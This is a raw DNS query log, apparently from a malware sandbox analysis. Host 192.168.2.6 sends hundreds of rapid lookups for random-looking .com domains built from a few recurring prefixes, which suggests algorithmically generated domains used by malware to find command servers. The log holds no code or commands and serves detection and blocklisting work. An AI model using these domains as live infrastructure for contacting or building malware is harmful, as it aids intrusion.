                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477641106 CET192.168.2.61.1.1.10xf84aStandard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477782965 CET192.168.2.61.1.1.10xcec7Standard query (0)lyxyjod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477953911 CET192.168.2.61.1.1.10xd8e3Standard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.478113890 CET192.168.2.61.1.1.10x72e7Standard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.478399992 CET192.168.2.61.1.1.10xd28eStandard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.495336056 CET192.168.2.61.1.1.10x1a8cStandard query (0)lyxymix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.495898962 CET192.168.2.61.1.1.10xb637Standard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496181965 CET192.168.2.61.1.1.10xe7efStandard query (0)gahyfyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496411085 CET192.168.2.61.1.1.10xddbdStandard query (0)vojygym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496603966 CET192.168.2.61.1.1.10xcec1Standard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496630907 CET192.168.2.61.1.1.10xe53dStandard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496788979 CET192.168.2.61.1.1.10xb691Standard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.496970892 CET192.168.2.61.1.1.10x203bStandard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497080088 CET192.168.2.61.1.1.10xcb36Standard query (0)galyhib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497157097 CET192.168.2.61.1.1.10x20c5Standard query (0)qeqytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497245073 CET192.168.2.61.1.1.10xa25bStandard query (0)lykygun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497384071 CET192.168.2.61.1.1.10x73f0Standard query (0)vopycoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497607946 CET192.168.2.61.1.1.10x9193Standard query (0)puvywal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497771025 CET192.168.2.61.1.1.10x9956Standard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.497936964 CET192.168.2.61.1.1.10xc0bStandard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.498084068 CET192.168.2.61.1.1.10xc616Standard query (0)lyvylyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.498217106 CET192.168.2.61.1.1.10xa60cStandard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.501128912 CET192.168.2.61.1.1.10xfc0aStandard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.501174927 CET192.168.2.61.1.1.10x2f15Standard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.501405954 CET192.168.2.61.1.1.10x2befStandard query (0)qebyrel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.501431942 CET192.168.2.61.1.1.10x246dStandard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.501810074 CET192.168.2.61.1.1.10xeb67Standard query (0)gadyvez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.502006054 CET192.168.2.61.1.1.10x3ca2Standard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.502130985 CET192.168.2.61.1.1.10x226bStandard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.509587049 CET192.168.2.61.1.1.10x7eb2Standard query (0)pujymiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.510622025 CET192.168.2.61.1.1.10x2f47Standard query (0)ganyrew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.510687113 CET192.168.2.61.1.1.10x9415Standard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.518148899 CET192.168.2.61.1.1.10x3bbaStandard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.833403111 CET192.168.2.61.1.1.10x96b3Standard query (0)lymylen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.834949017 CET192.168.2.61.1.1.10x4bc3Standard query (0)volymuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.837419033 CET192.168.2.61.1.1.10x7df1Standard query (0)qedysol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.838953972 CET192.168.2.61.1.1.10x415cStandard query (0)pumyleg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.839664936 CET192.168.2.61.1.1.10x85aStandard query (0)galynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.841047049 CET192.168.2.61.1.1.10xe2eeStandard query (0)lysysir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.841763020 CET192.168.2.61.1.1.10x8ff8Standard query (0)vonykam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.858962059 CET192.168.2.61.1.1.10x9cdbStandard query (0)pupypil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.859544992 CET192.168.2.61.1.1.10xf32Standard query (0)ganykah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.860491037 CET192.168.2.61.1.1.10xc5c1Standard query (0)qekynyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.862391949 CET192.168.2.61.1.1.10xb641Standard query (0)vojybef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.865293026 CET192.168.2.61.1.1.10xd4dbStandard query (0)qegyvag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.865422964 CET192.168.2.61.1.1.10x927Standard query (0)pufycog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.868166924 CET192.168.2.61.1.1.10xa1eStandard query (0)lygyvon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.871754885 CET192.168.2.61.1.1.10xb8caStandard query (0)puvyjiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.871882915 CET192.168.2.61.1.1.10x3288Standard query (0)vowyrec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.872580051 CET192.168.2.61.1.1.10x9123Standard query (0)gacyhuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.882071972 CET192.168.2.61.1.1.10x15dbStandard query (0)qebykoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.882488012 CET192.168.2.61.1.1.10xc3eeStandard query (0)vopyput.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.882709026 CET192.168.2.61.1.1.10x2eb7Standard query (0)vocyjik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.883059025 CET192.168.2.61.1.1.10x7720Standard query (0)lyrytyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.886920929 CET192.168.2.61.1.1.10x5d62Standard query (0)qetytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.890497923 CET192.168.2.61.1.1.10xc535Standard query (0)gatypuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.890862942 CET192.168.2.61.1.1.10x629cStandard query (0)gahyvab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.891947031 CET192.168.2.61.1.1.10x2a5bStandard query (0)pujybev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.896771908 CET192.168.2.61.1.1.10xc220Standard query (0)lyvyjoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.897557974 CET192.168.2.61.1.1.10x6242Standard query (0)lykynyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.897732973 CET192.168.2.61.1.1.10xa8bbStandard query (0)purytyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.357810974 CET192.168.2.61.1.1.10xfcb8Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.357960939 CET192.168.2.61.1.1.10xb763Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.360435009 CET192.168.2.61.1.1.10x5941Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.362837076 CET192.168.2.61.1.1.10xcbc9Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.362837076 CET192.168.2.61.1.1.10xa5f2Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.363410950 CET192.168.2.61.1.1.10xd3a2Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.364743948 CET192.168.2.61.1.1.10x2912Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.365075111 CET192.168.2.61.1.1.10xdf3eStandard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.366985083 CET192.168.2.61.1.1.10x9a26Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.368539095 CET192.168.2.61.1.1.10x9cf6Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.368700981 CET192.168.2.61.1.1.10xc313Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.369884014 CET192.168.2.61.1.1.10x26cStandard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.370193005 CET192.168.2.61.1.1.10xeab5Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.370908976 CET192.168.2.61.1.1.10xeb4fStandard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.371943951 CET192.168.2.61.1.1.10x89b9Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.372678041 CET192.168.2.61.1.1.10xef20Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.374361038 CET192.168.2.61.1.1.10x5d6bStandard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.376610994 CET192.168.2.61.1.1.10x1a31Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.378982067 CET192.168.2.61.1.1.10x1f87Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.383774042 CET192.168.2.61.1.1.10xf180Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.434801102 CET192.168.2.61.1.1.10x68c3Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.492309093 CET192.168.2.61.1.1.10x8b97Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.492383957 CET192.168.2.61.1.1.10xe970Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.492616892 CET192.168.2.61.1.1.10x8d45Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.492616892 CET192.168.2.61.1.1.10x87cbStandard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.492634058 CET192.168.2.61.1.1.10x30f7Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.492943048 CET192.168.2.61.1.1.10xbcfcStandard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.493241072 CET192.168.2.61.1.1.10xcfaaStandard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.551476955 CET192.168.2.61.1.1.10xe9f1Standard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.551964045 CET192.168.2.61.1.1.10xbd73Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:51.787251949 CET192.168.2.61.1.1.10xc8e7Standard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:51.787858009 CET192.168.2.61.1.1.10x9e61Standard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:51.790498972 CET192.168.2.61.1.1.10xacdaStandard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:51.920854092 CET192.168.2.61.1.1.10xf2f8Standard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:51.922207117 CET192.168.2.61.1.1.10xe588Standard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:51.926886082 CET192.168.2.61.1.1.10x6e59Standard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.057504892 CET192.168.2.61.1.1.10xc6eaStandard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.063374996 CET192.168.2.61.1.1.10xa29Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.165766954 CET192.168.2.61.1.1.10x856eStandard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.168313026 CET192.168.2.61.1.1.10x39Standard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.169126034 CET192.168.2.61.1.1.10xf23Standard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.170454979 CET192.168.2.61.1.1.10xf66aStandard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.171200991 CET192.168.2.61.1.1.10xc112Standard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.171900034 CET192.168.2.61.1.1.10x8a9fStandard query (0)lyvywed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.172735929 CET192.168.2.61.1.1.10x67a2Standard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.173531055 CET192.168.2.61.1.1.10xdec3Standard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.174280882 CET192.168.2.61.1.1.10xb72eStandard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.174395084 CET192.168.2.61.1.1.10x5d2Standard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.174810886 CET192.168.2.61.1.1.10xdd08Standard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.176392078 CET192.168.2.61.1.1.10x4212Standard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.176793098 CET192.168.2.61.1.1.10xfff1Standard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.177299023 CET192.168.2.61.1.1.10xbe00Standard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.181627989 CET192.168.2.61.1.1.10xb5ecStandard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.225616932 CET192.168.2.61.1.1.10xa625Standard query (0)qexykaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.225888968 CET192.168.2.61.1.1.10xb6fcStandard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.226002932 CET192.168.2.61.1.1.10x3bedStandard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.226181030 CET192.168.2.61.1.1.10x3493Standard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.226881981 CET192.168.2.61.1.1.10x236eStandard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.227183104 CET192.168.2.61.1.1.10x3893Standard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.227344990 CET192.168.2.61.1.1.10xb903Standard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228296995 CET192.168.2.61.1.1.10xb1c1Standard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228327036 CET192.168.2.61.1.1.10x82ccStandard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228461027 CET192.168.2.61.1.1.10x8563Standard query (0)vojymic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228517056 CET192.168.2.61.1.1.10xf27cStandard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228696108 CET192.168.2.61.1.1.10x5eafStandard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228718996 CET192.168.2.61.1.1.10xfddaStandard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228851080 CET192.168.2.61.1.1.10x96c2Standard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.260668039 CET192.168.2.61.1.1.10xca1aStandard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.260921001 CET192.168.2.61.1.1.10xe3a7Standard query (0)galyhiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.261267900 CET192.168.2.61.1.1.10x52faStandard query (0)qedyveg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.261545897 CET192.168.2.61.1.1.10x78d6Standard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.262326002 CET192.168.2.61.1.1.10x2cb2Standard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.262451887 CET192.168.2.61.1.1.10x8de5Standard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.262777090 CET192.168.2.61.1.1.10xccbdStandard query (0)ganyzub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.263106108 CET192.168.2.61.1.1.10x9faStandard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.263403893 CET192.168.2.61.1.1.10x587bStandard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.263465881 CET192.168.2.61.1.1.10xd6acStandard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.294856071 CET192.168.2.61.1.1.10x300fStandard query (0)qebylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.295133114 CET192.168.2.61.1.1.10x7eedStandard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.295659065 CET192.168.2.61.1.1.10x426cStandard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.296216965 CET192.168.2.61.1.1.10x42adStandard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.296726942 CET192.168.2.61.1.1.10xcfcbStandard query (0)lyvylyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.297211885 CET192.168.2.61.1.1.10x46ddStandard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.297929049 CET192.168.2.61.1.1.10xf124Standard query (0)vocykem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.876889944 CET192.168.2.61.1.1.10x4404Standard query (0)vonymuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.877022028 CET192.168.2.61.1.1.10x801eStandard query (0)pufyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.877088070 CET192.168.2.61.1.1.10xf68bStandard query (0)qeqyqiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.877088070 CET192.168.2.61.1.1.10xb4f9Standard query (0)pupylaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.877976894 CET192.168.2.61.1.1.10x812aStandard query (0)pumymuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.877978086 CET192.168.2.61.1.1.10xbdd3Standard query (0)gadyzyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.878339052 CET192.168.2.61.1.1.10x5972Standard query (0)qekysip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.880273104 CET192.168.2.61.1.1.10xe916Standard query (0)lyxyfar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.881311893 CET192.168.2.61.1.1.10xf3ccStandard query (0)gacyfew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.916754961 CET192.168.2.61.1.1.10xf4c8Standard query (0)gaqyqis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.917346001 CET192.168.2.61.1.1.10x9021Standard query (0)vowyqoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.917346001 CET192.168.2.61.1.1.10x49baStandard query (0)lysylej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.917803049 CET192.168.2.61.1.1.10x9636Standard query (0)volydot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.917803049 CET192.168.2.61.1.1.10xe4eeStandard query (0)lygyxun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.961081028 CET192.168.2.61.1.1.10x1d38Standard query (0)qexyfel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.071304083 CET192.168.2.61.1.1.10xb3baStandard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.084450006 CET192.168.2.61.1.1.10x7731Standard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.084577084 CET192.168.2.61.1.1.10x4a24Standard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.085345984 CET192.168.2.61.1.1.10xd80bStandard query (0)puzypug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.100730896 CET192.168.2.61.1.1.10x2c89Standard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.114089966 CET192.168.2.61.1.1.10xb186Standard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.115691900 CET192.168.2.61.1.1.10x6230Standard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.115968943 CET192.168.2.61.1.1.10x536eStandard query (0)lymyner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.119360924 CET192.168.2.61.1.1.10x11d8Standard query (0)qedykiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.120893955 CET192.168.2.61.1.1.10x3deeStandard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.123075962 CET192.168.2.61.1.1.10xdbe7Standard query (0)lysyjid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.125169992 CET192.168.2.61.1.1.10x6caaStandard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.126507044 CET192.168.2.61.1.1.10x2f01Standard query (0)vonybat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.127955914 CET192.168.2.61.1.1.10xbc83Standard query (0)qekytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.128983974 CET192.168.2.61.1.1.10x7a64Standard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.130000114 CET192.168.2.61.1.1.10x8ac9Standard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.137979031 CET192.168.2.61.1.1.10xd50eStandard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.147861958 CET192.168.2.61.1.1.10x18c4Standard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.162856102 CET192.168.2.61.1.1.10x9914Standard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.162988901 CET192.168.2.61.1.1.10x121bStandard query (0)vonygec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.164395094 CET192.168.2.61.1.1.10xa6b1Standard query (0)lyvyfad.comA (IP address)IN (0x0001)false
